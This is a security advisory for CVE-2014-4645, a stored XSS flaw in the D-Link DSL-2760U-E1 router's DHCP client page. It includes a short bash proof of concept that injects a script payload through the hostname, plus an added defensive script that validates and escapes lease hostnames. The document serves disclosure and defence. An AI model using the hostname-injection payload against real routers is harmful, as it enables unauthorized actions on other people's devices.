D-Link DSL-2760U-E1 Router 'dhcpinfo.html' HTML Injection Vulnerability

Published: 2014-06-23 11:14:00

BugTraq-ID: 68144

CVE-ID: CVE-2014-4645

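Affected systems:

D-Link DSL-2760U-E1

Details:

The D-Link DSL-2760U-E1 is a router product.

The D-Link DSL-2760U-E1 router contains an HTML injection vulnerability in its implementation. An attacker can exploit this vulnerability to perform unauthorized actions on the affected device.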

Source:

Yuval tisf Nativ

Test method:

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

#!/bin/bash

# Written and discovered by Yuval tisf Nativ
# The page 'dhcpinfo.html' will list all machines connected to the network with hostname,
# IP, MAC and IP expiration. It is possible to store an XSS in this table by changing hostname.

# Checks if you are root
if [ "$(id -u)" != "0" ]; then
    echo "Please execute this script as root"
    exit 1
fi

# Your XSS here
xss="\"<script>alert('pwned');</script>"

# backup current hostname
currhost=$(hostname)

# Bannering
echo ""
echo "      D-Link Persistent XSS by tisf"
echo ""
echo "The page dhcpinfo.html is the vulnerable page."
echo "Ask the user to access it and your persistent XSS will be triggered."
echo ""

# Change hostname to XSS
sudo hostname "$xss"

# Restore previous hostname on exit
read -n 1 -s -r -p "Type any key to exit and restore your previous hostname."
sudo hostname "$currhost"
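
Because the injected value reaches 'dhcpinfo.html' as a DHCP client hostname, a lease table can be audited for hostnames that are not valid host names, and any hostname can be HTML-escaped before it is displayed. The following is an added example, not part of the original advisory or of D-Link's code; the lease line format ("MAC IP HOSTNAME") and all function names are assumptions, and the sample leases are constructed.

```shell
#!/bin/sh
# Added example: audit DHCP lease hostnames and HTML-escape them for display.
LC_ALL=C; export LC_ALL   # make the A-Z / a-z / 0-9 ranges byte-exact

# Return 0 if $1 uses only letters, digits, '-' and '.', with no empty
# label and no label starting or ending with '-'. Per-label length is not checked.
is_safe_hostname() {
    name=$1
    [ -n "$name" ] && [ "${#name}" -le 253 ] || return 1
    case $name in
        *[!A-Za-z0-9.-]*) return 1 ;;   # character outside the hostname set
        .*|*.|*..*) return 1 ;;         # empty label
        -*|*-|*.-*|*-.*) return 1 ;;    # label starts or ends with '-'
    esac
    return 0
}

# Encode the five HTML metacharacters so the value renders as text, not markup.
html_escape() {
    printf '%s' "$1" | sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' \
        -e 's/>/\&gt;/g' -e 's/"/\&quot;/g' -e "s/'/\&#39;/g"
}

# Read "MAC IP HOSTNAME" lines on stdin (assumed format) and print one
# "SUSPECT mac ip escaped-hostname" line for each hostname that fails validation.
audit_leases() {
    while read -r mac ip host; do
        is_safe_hostname "$host" && continue
        printf 'SUSPECT %s %s %s\n' "$mac" "$ip" "$(html_escape "$host")"
    done
}

# Constructed sample lease table; the second hostname is the string from the script above.
sample_leases() {
    cat <<'EOF'
00:11:22:33:44:55 192.168.1.10 laptop-01
66:77:88:99:aa:bb 192.168.1.11 "<script>alert('pwned');</script>
cc:dd:ee:ff:00:11 192.168.1.12 printer.lan
22:33:44:55:66:77 192.168.1.13 -bad-
EOF
}

sample_leases | audit_leases
```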

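Solution:

Vendor patch:

D-Link
------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:

http://www.dlink.com/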